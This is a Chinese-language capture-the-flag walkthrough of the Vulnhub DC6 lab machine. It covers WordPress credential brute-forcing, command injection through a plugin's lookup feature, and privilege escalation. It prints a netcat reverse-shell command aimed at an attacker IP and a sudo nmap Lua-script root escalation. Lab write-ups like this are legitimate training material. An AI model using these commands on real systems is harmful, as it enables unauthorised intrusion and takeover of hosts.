Vulnhub系列之DC6靶场详解

环境

1. vulhub系列之DC6靶场
2. VMware虚拟机
3. kali

爆破拿后台密码

根据目标靶机MAC地址得到目标IP：192.168.43.60，直接上nmap扫描。

开启了22和80两个端口号，并且需要指定域名解析才可以访问网页，直接在`/etc/hosts`下写入`192.168.43.60 wordy`即可。

进入网站可以知道CMS为wordpress 5.1.1,直接wpscan扫描。

扫描出5个用户，把五个用户写入user.txt中，用wpscan进行密码爆破，密码用kali自带的（路径为/usr/share/wordlists/rockyou.txt)(官网给出了提示可以少花点时间爆破：`cat /usr/share/wordlists/rockyou.txt |grep k01>password.txt`)

爆破出一组密码mark/helpdesk01。 wordpress默认后台登陆路径为wp-admin。直接登陆。

命令执行拿shell

在后台找突破点，最终在activity monitor插件中找到lookup可以进行域名解析，尝试进行拼接命令执行。

发现可以进行命令执行，但是长度有限制，所以直接抓包反弹shell。

反弹成功。

sudo切换用户

在/home/mark/stuff中发现graham密码，直接ssh连接。

发现/home/jens/backups.sh不需要密码即可执行。于是写入反弹shell命令`nc -e /bin/bash 192.168.43.173 6666`，执行backups.sh即可得到jens的shell。

nmap脚本提权拿root权限

发现nmap不需要密码即可root权限执行。nmap的--script参数可以执行脚本，脚本是用lua语言写的。 进入/tmp目录执行命令：

echo 'os.execute("/bin/bash")'>getroot.sh
sudo nmap --script=getroot.sh

提权成功

拿到flag。